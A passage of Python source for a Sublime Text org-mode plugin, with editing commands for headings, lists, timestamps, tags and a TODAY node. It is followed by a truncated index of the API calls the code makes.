            bufferContents = view.substr(sublime.Region(sp,np))
            bufferContentsS = view.substr(sublime.Region(sp,ep))
            wasTab = bufferContentsS == "\t"
            if(bufferContents == " " or wasTab):
                if(wasTab):
                    view.erase(edit,sublime.Region(sp,ep))
                else:
                    view.erase(edit,sublime.Region(sp,np))
def deindent_node(view, node, edit):
    """Promote node one level: strip a star from its heading, one column
    of indent from each body line, and recursively promote children."""
    # Get my position and ensure this node CAN de-indent
    sp = view.text_point(node.start_row,0)
    ep = view.text_point(node.start_row,1)
    np = view.text_point(node.start_row,2)
    # Look at the SECOND character: only a level>=2 heading ("**...") has a
    # star there and can be promoted.
    bufferContents = view.substr(sublime.Region(ep,np))
    if(bufferContents == "*"):
        view.erase(edit,sublime.Region(sp,ep))
        # Now erase a space at the front of my contents.
        for i in range(node.start_row+1,node.local_end_row+1):
            sp = view.text_point(i,0)
            ep = view.text_point(i,1)
            bufferContents = view.substr(sublime.Region(sp,ep))
            if(bufferContents == " " or bufferContents == "\t"):
                view.erase(edit,sublime.Region(sp,ep))
        for n in node.children:
            deindent_node(view, n, edit)
    else:
        log.debug("Did not get star, not deindenting it " + str(len(bufferContents)) + " " + bufferContents)
# Thing is a region, and first line of the thing tuple
# things is a list of thing
def sort_things_alphabetically(things, reverse=False):
    """In-place sort of (region, first-line) pairs by their first line."""
    things[:] = sorted(things, key=lambda entry: entry[1], reverse=reverse)
class OrgSortListCommand(sublime_plugin.TextCommand):
    """Alphabetically sort the numbered or unordered list at point."""
    def run(self, edit):
        # Get a list of things (each: ((start_row, end_row), first_line_text))
        things = None
        wasNumbered = False
        if(numberedlist.isNumberedLine(self.view)):
            wasNumbered = True
            things = numberedlist.getListAtPointForSorting(self.view)
        elif(checkbox.isUnorderedList(self.view.getLine(self.view.curRow()))):
            things = checkbox.getListAtPointForSorting(self.view)
        if(not things):
            log.error(" Could not sort at point")
            return
        # Build macro region covering the whole list.
        start = things[0][0][0]
        end = things[len(things)-1][0][1]
        sp = self.view.text_point(start,0)
        ep = self.view.text_point(end,0)
        ep = self.view.line(ep).end()
        reg = sublime.Region(sp,ep)
        # Sort the things
        sort_things_alphabetically(things)
        # Copy from macro region to sorted version
        buffer = ""
        for thing in things:
            bs = self.view.text_point(thing[0][0],0)
            be = self.view.text_point(thing[0][1]-1,0)
            be = self.view.line(be).end()
            breg = sublime.Region(bs,be)
            ss = self.view.substr(breg).rstrip() + "\n"
            buffer += ss
        # Replace the macro region with new str
        self.view.replace(edit, reg, buffer)
        # Renumber after reordering a numbered list.
        if(wasNumbered):
            self.view.run_command('org_update_numbered_list')
        pass
class OrgSelectSubtreeCommand(sublime_plugin.TextCommand):
    """Select the current heading together with its entire subtree."""
    def run(self, edit):
        current = db.Get().AtInView(self.view)
        if not current or type(current) == node.OrgRootNode or current._index <= 1:
            return
        begin = self.view.text_point(current.start_row, 0)
        last_line = self.view.line(self.view.text_point(current.end_row, 0))
        subtree = sublime.Region(begin, last_line.end() + 1)
        selection = self.view.sel()
        selection.clear()
        selection.add(subtree)
class OrgCopySubtreeCommand(sublime_plugin.TextCommand):
    """Copy the current heading and its entire subtree to the clipboard."""
    def run(self, edit):
        current = db.Get().AtInView(self.view)
        if not current or type(current) == node.OrgRootNode or current._index <= 1:
            return
        begin = self.view.text_point(current.start_row, 0)
        last_line = self.view.line(self.view.text_point(current.end_row, 0))
        subtree_text = self.view.substr(sublime.Region(begin, last_line.end() + 1))
        sublime.set_clipboard(subtree_text)
        # Mirror into the neovintageous clipboard as well.
        nvi.TestAndSetClip(self.view, subtree_text)
class OrgSelectEntityCommand(sublime_plugin.TextCommand):
    """Select the current heading and its own body (children excluded)."""
    def run(self, edit):
        current = db.Get().AtInView(self.view)
        if not current or type(current) == node.OrgRootNode or current._index <= 1:
            return
        begin = self.view.text_point(current.start_row, 0)
        last_line = self.view.line(self.view.text_point(current.local_end_row, 0))
        entity = sublime.Region(begin, last_line.end() + 1)
        selection = self.view.sel()
        selection.clear()
        selection.add(entity)
class OrgCopyEntityCommand(sublime_plugin.TextCommand):
    """Copy the current heading and its own body (children excluded)."""
    def run(self, edit):
        current = db.Get().AtInView(self.view)
        if not current or type(current) == node.OrgRootNode or current._index <= 1:
            return
        begin = self.view.text_point(current.start_row, 0)
        last_line = self.view.line(self.view.text_point(current.local_end_row, 0))
        entity_text = self.view.substr(sublime.Region(begin, last_line.end() + 1))
        sublime.set_clipboard(entity_text)
        # Mirror into the neovintageous clipboard as well.
        nvi.TestAndSetClip(self.view, entity_text)
class OrgCopyLinkHrefCommand(sublime_plugin.TextCommand):
    """Copy the href of the org link on the cursor's line to the clipboard."""
    def run(self, edit):
        if(self.view.match_selector(self.view.sel()[0].begin(), "orgmode.link")):
            pt = self.view.sel()[0].end()
            links = self.view.find_by_selector("orgmode.link")
            hrefs = self.view.find_by_selector("orgmode.link.href")
            reg = None
            # Find the link whose line holds the cursor, then the href
            # region sitting on that same line.
            for link in links:
                line = self.view.line(link.begin())
                if(line.contains(pt)):
                    for href in hrefs:
                        if(line.contains(href.begin())):
                            reg = href
                            break
                    break
            if(reg):
                nodetext = self.view.substr(reg)
                sublime.set_clipboard(nodetext)
                # Mirror into the neovintageous clipboard as well.
                nvi.TestAndSetClip(self.view, nodetext)
class OrgSelectLinkHrefCommand(sublime_plugin.TextCommand):
    """Select the href of the org link on the cursor's line."""
    def run(self, edit):
        if(self.view.match_selector(self.view.sel()[0].begin(), "orgmode.link")):
            pt = self.view.sel()[0].end()
            links = self.view.find_by_selector("orgmode.link")
            hrefs = self.view.find_by_selector("orgmode.link.href")
            reg = None
            # Find the link whose line holds the cursor, then the href
            # region sitting on that same line.
            for link in links:
                line = self.view.line(link.begin())
                if(line.contains(pt)):
                    for href in hrefs:
                        if(line.contains(href.begin())):
                            reg = href
                            break
                    break
            if(reg):
                self.view.sel().clear()
                self.view.sel().add(reg)
class OrgMoveHeadingUpCommand(sublime_plugin.TextCommand):
    """Swap the current subtree with its previous sibling, keeping the
    cursor column on the moved heading."""
    def run(self, edit):
        curNode = db.Get().AtInView(self.view)
        if(curNode and type(curNode) != node.OrgRootNode and curNode._index > 1):
            targetNode = curNode.get_sibling_up()
            if(targetNode):
                index = targetNode._index - 1
                # r is immediately reused as a line region below; only c
                # (the cursor column) is kept from this call.
                r,c = self.view.curRowCol()
                sp = self.view.text_point(curNode.start_row, 0)
                ep = self.view.text_point(curNode.end_row, 0)
                r = self.view.line(ep)
                reg = sublime.Region(sp, r.end()+1)
                nodetext = self.view.substr(reg)
                sp = self.view.text_point(targetNode.start_row, 0)
                treg = sublime.Region(sp, sp)
                # Erase the subtree, then re-insert it above the sibling.
                self.view.erase(edit,reg)
                self.view.insert(edit,sp,nodetext)
                self.view.sel().clear()
                np = self.view.text_point(targetNode.start_row, c)
                self.view.sel().add(np)
class OrgMoveHeadingDownCommand(sublime_plugin.TextCommand):
    """Swap the current subtree with its next sibling."""
    def run(self, edit):
        curNode = db.Get().AtInView(self.view)
        if(curNode and type(curNode) != node.OrgRootNode and curNode._index < (len(curNode.env._nodes) - 1)):
            targetNode = curNode.get_sibling_down()
            if(targetNode):
                # Swap roles: moving down is implemented as moving the
                # lower sibling up above us.
                temp = curNode
                curNode = targetNode
                targetNode = temp
                index = targetNode._index - 1
                sp = self.view.text_point(curNode.start_row, 0)
                ep = self.view.text_point(curNode.end_row, 0)
                r = self.view.line(ep)
                reg = sublime.Region(sp, r.end()+1)
                nodetext = self.view.substr(reg)
                sp = self.view.text_point(targetNode.start_row, 0)
                treg = sublime.Region(sp, sp)
                endline = self.view.line(self.view.size())
                # A last node at the buffer end has no trailing newline;
                # add one so the reinserted text stays well-formed.
                if(curNode.is_last_node() and curNode.end_row >= self.view.endRow()):
                    line = self.view.substr(self.view.line(self.view.text_point(self.view.endRow(),0)))
                    isEmpty = line.strip() == ""
                    if(not isEmpty):
                        nodetext = nodetext + "\n"
                self.view.erase(edit,reg)
                self.view.insert(edit,sp,nodetext)
class OrgInsertHeadingSiblingCommand(sublime_plugin.TextCommand):
    """Insert a new heading at the same level as the current one, via the
    per-level heading snippet."""
    def run(self, edit):
        curNode = db.Get().AtInView(self.view)
        needsNewline = False
        if(not curNode):
            # No node at point: append at the end of the buffer.
            level = 1
            here = sublime.Region(self.view.size(),self.view.size())
            reg = here
            text = self.view.substr(self.view.line(reg))
            if(text.strip() != ""):
                needsNewline = True
        else:
            level = curNode.level
            reg = curNode.region(self.view,True) # trim ending whitespace
            if(level == 0):
                level = 1
                here = sublime.Region(self.view.size(),self.view.size())
                text = self.view.substr(self.view.line(reg))
                if(text.strip() != ""):
                    needsNewline = True
            else:
                here = sublime.Region(reg.end(),reg.end())
                text = self.view.substr(self.view.line(here))
                if(text.strip() != ""):
                    needsNewline = True
        self.view.sel().clear()
        self.view.sel().add(reg.end())
        self.view.show(here)
        if(needsNewline):
            self.view.insert(edit,self.view.sel()[0].begin(),'\n')
        # Snippets re-indent by default; suppress that while inserting.
        ai = sublime.active_window().active_view().settings().get('auto_indent')
        self.view.settings().set('auto_indent',False)
        self.view.run_command("insert_snippet", {"name" : "Packages/OrgExtended/orgsnippets/heading"+str(level)+".sublime-snippet"})
        sublime.active_window().active_view().settings().set('auto_indent',ai)
class OrgInsertHeadingChildCommand(sublime_plugin.TextCommand):
    """Insert a new heading one level below the current one, via the
    per-level heading snippet. Fires onDone when the snippet is in."""
    def run(self, edit, onDone=None):
        curNode = db.Get().AtInView(self.view)
        needsNewline = False
        if(not curNode):
            # Fall back to the last node in the file, if any.
            file = db.Get().FindInfo(self.view)
            if(len(file.org) > 0):
                curNode = file.org[len(file.org) - 1]
        if(not curNode):
            level = 1
            l = self.view.line(self.view.size())
            reg = sublime.Region(l.start(),l.start())
            # BUG FIX: was `reg = here`, a NameError — `here` was not yet
            # defined on this path.
            here = reg
        else:
            level = curNode.level
            reg = curNode.region(self.view, True)
            if(level == 0):
                level = 1
                # BUG FIX: was `view.size()` (undefined name); the view is
                # only reachable through self.
                here = sublime.Region(self.view.size(),self.view.size())
            else:
                here = sublime.Region(reg.end(),reg.end())
        text = self.view.substr(self.view.line(here))
        if(text.strip() != ""):
            needsNewline = True
        if(not needsNewline):
            ll = self.view.line(reg.end())
            text = self.view.substr(ll)
            if(text.strip() == "" and len(text) > 0):
                # This is an empty line! Have to work at the front of this line!
                # Or we will insert to an odd location!
                reg = sublime.Region(ll.start(), ll.start())
        self.view.sel().clear()
        self.view.sel().add(reg.end())
        self.view.show(here)
        if(needsNewline):
            self.view.insert(edit,self.view.sel()[0].begin(),'\n')
        # Snippets re-indent by default; suppress that while inserting.
        ai = sublime.active_window().active_view().settings().get('auto_indent')
        self.view.settings().set('auto_indent',False)
        self.view.run_command("insert_snippet", {"name" : "Packages/OrgExtended/orgsnippets/heading"+str((level+1))+".sublime-snippet"})
        sublime.active_window().active_view().settings().set('auto_indent',ai)
        evt.EmitIf(onDone)
# This will insert whatever text you provide as a child heading of the current node
# This will insert whatever text you provide as a child heading of the current node
class OrgInsertTextAsChildHeadingCommand(sublime_plugin.TextCommand):
    """Insert `heading` verbatim as a child heading of the node at point."""
    def run(self, edit, heading=None, onDone=None):
        curNode = db.Get().AtInView(self.view)
        if(not curNode):
            # Fall back to the last node in the file, if any.
            file = db.Get().FindInfo(self.view)
            if(len(file.org) > 0):
                curNode = file.org[len(file.org) - 1]
        if(not curNode):
            level = 1
            l = self.view.line(self.view.size())
            reg = sublime.Region(l.start(),l.start())
            # BUG FIX: was `reg = here`, a NameError — `here` was not yet
            # defined on this path.
            here = reg
        else:
            level = curNode.level
            reg = curNode.region(self.view)
            if(level == 0):
                level = 1
                # BUG FIX: was `view.size()` (undefined name); the view is
                # only reachable through self.
                here = sublime.Region(self.view.size(),self.view.size())
            else:
                here = sublime.Region(reg.end(),reg.end())
        self.view.sel().clear()
        self.view.sel().add(reg.end()+1)
        #self.view.show(here)
        # Child heading = one more star than the parent level.
        self.view.insert(edit,self.view.sel()[0].begin(),'\n' + ('*'*(level+1)) + ' ' + heading)
        evt.EmitIf(onDone)
class OrgInsertTodayInactiveCommand(sublime_plugin.TextCommand):
    """Insert an inactive [date] stamp for today at the cursor."""
    def run(self, edit):
        stamp = orgdate.OrgDate.format_date(datetime.datetime.now(), False)
        self.view.insert(edit, self.view.sel()[0].begin(), stamp)
class OrgInsertNowInactiveCommand(sublime_plugin.TextCommand):
    """Insert an inactive [date time] stamp for right now at the cursor."""
    def run(self, edit):
        stamp = orgdate.OrgDate.format_clock(datetime.datetime.now(), False)
        self.view.insert(edit, self.view.sel()[0].begin(), stamp)
class OrgInsertTodayActiveCommand(sublime_plugin.TextCommand):
    """Insert an active <date> stamp for today at the cursor."""
    def run(self, edit):
        stamp = orgdate.OrgDate.format_date(datetime.datetime.now(), True)
        self.view.insert(edit, self.view.sel()[0].begin(), stamp)
class OrgInsertNowActiveCommand(sublime_plugin.TextCommand):
    """Insert an active <date time> stamp for right now at the cursor."""
    def run(self, edit):
        stamp = orgdate.OrgDate.format_clock(datetime.datetime.now(), True)
        self.view.insert(edit, self.view.sel()[0].begin(), stamp)
class OrgInsertDateInactiveCommand(sublime_plugin.TextCommand):
    """Prompt with the date picker, then insert an inactive timestamp."""
    def insert(self, date):
        # Picker callback; date is None when the user cancels.
        if not date:
            return
        stamp = OrgDate.format_clock(date.start, active=False)
        self.view.Insert(self.view.sel()[0].begin(), stamp)
    def run(self, edit):
        datep.Pick(evt.Make(self.insert))
class OrgInsertDateActiveCommand(sublime_plugin.TextCommand):
    """Prompt with the date picker, then insert an active timestamp."""
    def insert(self, date):
        # Picker callback; date is None when the user cancels.
        if not date:
            return
        stamp = OrgDate.format_clock(date.start, active=True)
        self.view.Insert(self.view.sel()[0].begin(), stamp)
    def run(self, edit):
        datep.Pick(evt.Make(self.insert))
class OrgBaseTimestampCommand(sublime_plugin.TextCommand):
    """Base for commands that place `prefix` (e.g. "SCHEDULED: ") under the
    current heading and then fill in a timestamp, interactively or from an
    explicit dateval argument."""
    def __init__(self,unknown=None, prefix=None):
        super(OrgBaseTimestampCommand, self).__init__(unknown)
        self.prefix = prefix
    def insert(self, date):
        """Picker callback: insert the stamp, or roll back on cancel."""
        if(date):
            self.view.Insert(self.view.sel()[0].begin(), OrgDate.format_clock(date.start, active=True))
        else:
            # Cancelled: remove the prefix we inserted and restore selection.
            self.view.Erase(self.reg)
            self.view.sel().clear()
            self.view.sel().add(self.oldsel)
    def run(self, edit, dateval=None):
        if(type(dateval) == str):
            dateval = orgdate.OrgDateFreeFloating.from_str(dateval)
        # TODO: Find scheduled and replace it as well.
        node = db.Get().AtInView(self.view)
        if(node and not node.is_root()):
            self.oldsel = self.view.sel()[0]
            pt = self.view.text_point(node.start_row,0)
            l = self.view.line(pt)
            # Last row handling If we are the last row we can't jump over the newline
            # we have to add one.
            nl = ""
            addnl = 1
            if(self.view.isBeyondLastRow(node.start_row+1)):
                nl = "\n"
                addnl = 0
            insertpt = l.end() + addnl
            endpt = insertpt + len(nl) + len(node.indent()) + len(self.prefix)
            # Remember the inserted span so insert() can undo it on cancel.
            self.reg = sublime.Region(insertpt, endpt)
            self.view.insert(edit, insertpt, nl + node.indent() + self.prefix)
            pt = self.view.text_point(node.start_row+1,0)
            l = self.view.line(pt)
            self.view.sel().clear()
            self.view.sel().add(l.end())
            if(dateval == None):
                datep.Pick(evt.Make(self.insert))
            else:
                self.insert(dateval)
class OrgScheduleCommand(OrgBaseTimestampCommand):
    """Insert a SCHEDULED: stamp under the current heading."""
    def __init__(self, unknown=None):
        super().__init__(unknown, "SCHEDULED: \n")
class OrgDeadlineCommand(OrgBaseTimestampCommand):
    """Insert a DEADLINE: stamp under the current heading."""
    def __init__(self, unknown=None):
        super().__init__(unknown, "DEADLINE: \n")
class OrgActiveTimestampCommand(OrgBaseTimestampCommand):
    """Insert a bare active timestamp under the current heading."""
    def __init__(self, unknown=None):
        super().__init__(unknown, " \n")
class OrgInsertClosedCommand(sublime_plugin.TextCommand):
    """Insert a CLOSED: stamp (inactive, now) beneath the current heading."""
    def run(self, edit):
        # NOTE(review): raises AttributeError if there is no node at point —
        # no None check before is_root(); verify callers guarantee a node.
        node = db.Get().AtInView(self.view)
        if(not node.is_root()):
            self.oldsel = self.view.sel()[0]
            pt = self.view.text_point(node.start_row,0)
            l = self.view.line(pt)
            # Last row handling If we are the last row we can't jump over the newline
            # we have to add one.
            nl = ""
            addnl = 1
            if(self.view.isBeyondLastRow(node.start_row+1)):
                nl = "\n"
                addnl = 0
            now = datetime.datetime.now()
            toInsert = orgdate.OrgDate.format_clock(now, False)
            self.view.insert(edit, l.end() + addnl, nl + node.indent() + "CLOSED: "+toInsert+"\n")
# ================================================================================
# Captures the heading text and any existing trailing :tag:tag: block.
RE_TAGS = re.compile(r'^(?P<heading>[*]+[^:]+\s*)(\s+(?P<tags>[:]([^: ]+[:])+))?$')
class OrgInsertTagCommand(sublime_plugin.TextCommand):
    """Add a tag to the current heading, prompting when none is given."""
    def OnDone(self, text):
        """Apply `text` as a tag on the node at point (no-op if empty)."""
        if(not text):
            return
        node = db.Get().AtInView(self.view)
        if(node):
            if not text in node.tags:
                (region, line) = self.view.getLineAndRegion(node.start_row)
                m = RE_TAGS.search(line)
                # Append to the existing tag block, or start a new one.
                if(m.group('tags') != None):
                    tags = m.group('tags') + text + ":"
                else:
                    tags = " :" + text + ":"
                # Pad the heading to column 70 so tags line up.
                toline = "{0:70}{1}".format(m.group('heading'), tags)
                self.view.ReplaceRegion(region,toline,self.onDone)
            else:
                log.debug("Tag already part of node")
                evt.EmitIf(self.onDone)
    def run(self, edit, text=None, onDone=None):
        self.onDone = onDone
        self.text = text.strip() if text != None else text
        if(self.text != None and self.text != ""):
            self.OnDone(self.text)
        else:
            # No tag supplied: prompt with completion over known tags.
            self.input = insSel.OrgInput()
            self.input.run("Tag:",db.Get().tags,evt.Make(self.OnDone))
# ================================================================================
class OrgInsertArchiveTagCommand(sublime_plugin.TextCommand):
    """Add the ARCHIVE tag to the current heading."""
    def OnDone(self):
        evt.EmitIf(self.onDone)
    def run(self, edit, onDone=None):
        self.onDone = onDone
        args = {"onDone": evt.Make(self.OnDone), "text": "ARCHIVE"}
        self.view.run_command("org_insert_tag", args)
# ================================================================================
class OrgInsertCustomIdCommand(sublime_plugin.TextCommand):
    """Prompt for and set the CUSTOM_ID property on the node at point."""
    def on_done(self, text):
        if not text:
            return
        # No spaces allowed in a custom id.
        custom_id = text.replace(" ","-")
        target = db.Get().AtInView(self.view)
        if target and not target.is_root():
            props.UpdateProperty(self.view, target, "CUSTOM_ID", custom_id, self.onDone)
    def run(self, edit, onDone=None):
        self.onDone = onDone
        self.input = insSel.OrgInput()
        #print(str(db.Get().customids))
        self.input.run("Custom Id:", db.Get().customids, evt.Make(self.on_done))
# ================================================================================
class OrgSetTodayCommand(sublime_plugin.TextCommand):
    """Make the node at point the unique TODAY node: strip CUSTOM_ID=TODAY
    from whichever node currently holds it, then assign it here."""
    def run(self, edit, onDone=None):
        self.onDone = onDone
        idValue = "TODAY"
        node = db.Get().AtInView(self.view)
        if(not node or node.is_root()):
            log.debug("Cannot update root node or non existent node as today")
            return
        # Remove the id from the current holder, if any.
        file, at = db.Get().FindByCustomId(idValue)
        if(file != None and at != None):
            node = file.At(at)
            if(node):
                props.RemoveProperty(self.view, node, "CUSTOM_ID")
        # Re-fetch the node at point (edits above may have shifted rows).
        node = db.Get().AtInView(self.view)
        if(node and not node.is_root()):
            props.UpdateProperty(self.view,node,"CUSTOM_ID",idValue,self.onDone)
def get_view_for_silent_edit_file(file):
    """Return a view on file without stealing focus (opening it if needed)."""
    window = sublime.active_window()
    existing = window.find_open_file(file.filename)
    if existing:
        return existing
    # The file is not open yet. Open it, then hand focus straight back to
    # the previously active view so the user never sees the switch.
    focused = window.active_view()
    opened = window.open_file(file.filename, sublime.ENCODED_POSITION)
    window.focus_view(focused)
    return opened
# ================================================================================
class RunEditingCommandOnToday:
    """Run an editing text command against the TODAY node's file without
    stealing focus, then save and reload that file.

    Sequence: Run -> (async) onLoaded -> command -> onEdited -> save ->
    (async) onSaved -> onDone.
    """
    def __init__(self, view, command, cmds = None):
        self.view = view
        self.command = command
        # BUG FIX: was `cmds = {}` — a mutable default. onLoaded mutates
        # this dict (cmds["onDone"] = ...), so the shared default leaked
        # state across every instance constructed without cmds.
        self.cmds = {} if cmds is None else cmds
    def onSaved(self):
        db.Get().Reload(self.savedView)
        evt.EmitIf(self.onDone)
    def onEdited(self):
        # NOTE the save here doesn't seem to be working
        # Not sure why. BUT...
        view = self.savedView
        view.run_command("save")
        sublime.set_timeout_async(lambda: self.onSaved(), 100)
    def onLoaded(self):
        view = self.savedView
        self.n.move_cursor_to(view)
        # One-shot event so the command can tell us when it has finished.
        eventName = util.RandomString()
        evt.Get().once(eventName, self.onEdited)
        log.debug("Trying to run: " + self.command)
        cmds = self.cmds
        cmds["onDone"] = eventName
        view.run_command(self.command, cmds)
    def Run(self,onDone = None):
        self.onDone = onDone
        idValue = "TODAY"
        file, at = db.Get().FindByCustomId(idValue)
        if(file != None and at != None):
            node = file.At(at)
            if(node):
                self.n = node
                self.f = file
                self.savedView = get_view_for_silent_edit_file(file)
                # Give time for the document to be opened.
                sublime.set_timeout_async(lambda: self.onLoaded(), 200)
                return
            else:
                log.warning("COULD NOT LOCATE TODAY")
        else:
            log.warning("Could not locate today")
# Append text to a node
# Append text to a node
class OrgAppendTextCommand(sublime_plugin.TextCommand):
    """Append `text` as an indented body line at the end of the node at
    point (or of the file's last node)."""
    def run(self, edit, text="", onDone=None):
        curNode = db.Get().AtInView(self.view)
        if(not curNode):
            # Fall back to the last node in the file, if any.
            file = db.Get().FindInfo(self.view)
            if(len(file.org) > 0):
                curNode = file.org[len(file.org) - 1]
        if(not curNode):
            level = 1
            l = self.view.line(self.view.size())
            reg = sublime.Region(l.start(),l.start())
            # BUG FIX: was `reg = here`, a NameError — `here` was not yet
            # defined on this path.
            here = reg
        else:
            level = curNode.level
            reg = curNode.region(self.view)
            if(level == 0):
                level = 1
                # BUG FIX: was `view.size()` (undefined name); the view is
                # only reachable through self.
                here = sublime.Region(self.view.size(),self.view.size())
            else:
                here = sublime.Region(reg.end(),reg.end())
        self.view.sel().clear()
        self.view.sel().add(reg.end() + 1)
        #self.view.show(here)
        # Indent two spaces per heading level so the text sits in the body.
        self.view.insert(edit,self.view.sel()[0].begin(),'\n' + (' '*(level*2)) + text)
        evt.EmitIf(onDone)
class OrgLinkToTodayCommand(sublime_plugin.TextCommand):
    """Schedule the node at point and append a link to it under the TODAY
    node (as a child heading when the node has one)."""
    def OnDone(self):
        evt.EmitIf(self.onDone)
    def InsertLink(self):
        # Append the captured link to TODAY via the silent-edit helper.
        self.ed = RunEditingCommandOnToday(self.view, "org_append_text", {'text': self.link})
        self.ed.Run(evt.Make(self.OnDone))
    def run(self, edit, onDone=None):
        self.onDone = onDone
        # Schedule this item so it is in the agenda
        self.view.run_command("org_schedule", {"dateval": str(datetime.datetime.now())})
        # Create a link to the current location so we can insert it in our today item
        self.link = orglink.CreateLink(self.view)
        curNode = db.Get().AtInView(self.view)
        # Should we add a heading to this?
        if(curNode and not curNode.is_root()):
            self.ed = RunEditingCommandOnToday(self.view, "org_insert_text_as_child_heading", {'heading': curNode.heading})
            self.ed.Run(evt.Make(self.InsertLink))
        else:
            self.InsertLink()
class OrgEnterOnHeadingCommand(sublime_plugin.TextCommand):
    def run(self, edit, Indent=1):
        """Insert a newline indented relative to a heading of level Indent.

        Indent: heading level to indent beneath (defaults to 1).
        """
        # One space per heading level plus a trailing space - presumably to
        # align the new line under the heading's title text; TODO confirm.
        indent = (" " * Indent) + " "
        self.view.run_command("org_internal_insert", {"location": self.view.sel()[0].begin(), "text": "\n" + indent})
| [
"logging.getLogger",
"re.compile",
"OrgExtended.orgparse.date.OrgDateFreeFloating.from_str",
"OrgExtended.orgparse.date.OrgDate.format_clock",
"sublime.Region",
"OrgExtended.pymitter.Get",
"OrgExtended.orgproperties.UpdateProperty",
"sublime.active_window",
"OrgExtended.orglinks.CreateLink",
"OrgE... | [((961, 988), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (978, 988), False, 'import logging\n'), ((1694, 1732), 're.compile', 're.compile', (['"""^\\\\s*CLOSED:\\\\s*\\\\[.*\\\\]"""'], {}), "('^\\\\s*CLOSED:\\\\s*\\\\[.*\\\\]')\n", (1704, 1732), False, 'import re\n'), ((4792, 4856), 're.compile', 're.compile', (['"""\\\\s(?P<time><\\\\s*\\\\d+-\\\\d+-\\\\d+\\\\s+[^>]+>)(\\\\s+|$)"""'], {}), "('\\\\s(?P<time><\\\\s*\\\\d+-\\\\d+-\\\\d+\\\\s+[^>]+>)(\\\\s+|$)')\n", (4802, 4856), False, 'import re\n'), ((33143, 33217), 're.compile', 're.compile', (['"""^(?P<heading>[*]+[^:]+\\\\s*)(\\\\s+(?P<tags>[:]([^: ]+[:])+))?$"""'], {}), "('^(?P<heading>[*]+[^:]+\\\\s*)(\\\\s+(?P<tags>[:]([^: ]+[:])+))?$')\n", (33153, 33217), False, 'import re\n'), ((3660, 3679), 'OrgExtended.orgparse.node.root.startup', 'node.root.startup', ([], {}), '()\n', (3677, 3679), True, 'import OrgExtended.orgparse.node as node\n'), ((4672, 4691), 'OrgExtended.orgparse.node.root.startup', 'node.root.startup', ([], {}), '()\n', (4689, 4691), True, 'import OrgExtended.orgparse.node as node\n'), ((13819, 13864), 'OrgExtended.orgnumberedlist.findChildrenByIndent', 'numberedlist.findChildrenByIndent', (['view', 'line'], {}), '(view, line)\n', (13852, 13864), True, 'import OrgExtended.orgnumberedlist as numberedlist\n'), ((36271, 36294), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (36292, 36294), False, 'import sublime\n'), ((2086, 2109), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2107, 2109), False, 'import datetime\n'), ((2894, 2912), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['onDone'], {}), '(onDone)\n', (2904, 2912), True, 'import OrgExtended.pymitter as evt\n'), ((3267, 3323), 'OrgExtended.orgparse.node.get_timestamps', 'node.get_timestamps', ([], {'active': '(True)', 'point': '(True)', 'range': '(True)'}), '(active=True, point=True, range=True)\n', (3286, 3323), True, 'import OrgExtended.orgparse.node as 
node\n'), ((3933, 3956), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3954, 3956), False, 'import datetime\n'), ((4001, 4063), 'OrgExtended.orgproperties.UpdateProperty', 'props.UpdateProperty', (['view', 'node', '"""LAST_REPEAT"""', 'stamp', 'onDone'], {}), "(view, node, 'LAST_REPEAT', stamp, onDone)\n", (4021, 4063), True, 'import OrgExtended.orgproperties as props\n'), ((4185, 4205), 'OrgExtended.pymitter.Make', 'evt.Make', (['OnLogAdded'], {}), '(OnLogAdded)\n', (4193, 4205), True, 'import OrgExtended.pymitter as evt\n'), ((4308, 4331), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4329, 4331), False, 'import datetime\n'), ((4995, 5018), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (5005, 5018), True, 'import OrgExtended.pymitter as evt\n'), ((10968, 10991), 're.compile', 're.compile', (['self.todoRe'], {}), '(self.todoRe)\n', (10978, 10991), False, 'import re\n'), ((12858, 12877), 're.compile', 're.compile', (['self.Re'], {}), '(self.Re)\n', (12868, 12877), False, 'import re\n'), ((14192, 14214), 'sublime.Region', 'sublime.Region', (['sp', 'np'], {}), '(sp, np)\n', (14206, 14214), False, 'import sublime\n'), ((14249, 14271), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (14263, 14271), False, 'import sublime\n'), ((14543, 14588), 'OrgExtended.orgnumberedlist.findChildrenByIndent', 'numberedlist.findChildrenByIndent', (['view', 'line'], {}), '(view, line)\n', (14576, 14588), True, 'import OrgExtended.orgnumberedlist as numberedlist\n'), ((15394, 15416), 'sublime.Region', 'sublime.Region', (['ep', 'np'], {}), '(ep, np)\n', (15408, 15416), False, 'import sublime\n'), ((16440, 16478), 'OrgExtended.orgnumberedlist.isNumberedLine', 'numberedlist.isNumberedLine', (['self.view'], {}), '(self.view)\n', (16467, 16478), True, 'import OrgExtended.orgnumberedlist as numberedlist\n'), ((17064, 17086), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, 
ep)\n', (17078, 17086), False, 'import sublime\n'), ((27334, 27352), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['onDone'], {}), '(onDone)\n', (27344, 27352), True, 'import OrgExtended.pymitter as evt\n'), ((28437, 28455), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['onDone'], {}), '(onDone)\n', (28447, 28455), True, 'import OrgExtended.pymitter as evt\n'), ((28569, 28592), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (28590, 28592), False, 'import datetime\n'), ((28612, 28651), 'OrgExtended.orgparse.date.OrgDate.format_date', 'orgdate.OrgDate.format_date', (['now', '(False)'], {}), '(now, False)\n', (28639, 28651), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((28823, 28846), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (28844, 28846), False, 'import datetime\n'), ((28866, 28906), 'OrgExtended.orgparse.date.OrgDate.format_clock', 'orgdate.OrgDate.format_clock', (['now', '(False)'], {}), '(now, False)\n', (28894, 28906), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((29078, 29101), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (29099, 29101), False, 'import datetime\n'), ((29121, 29159), 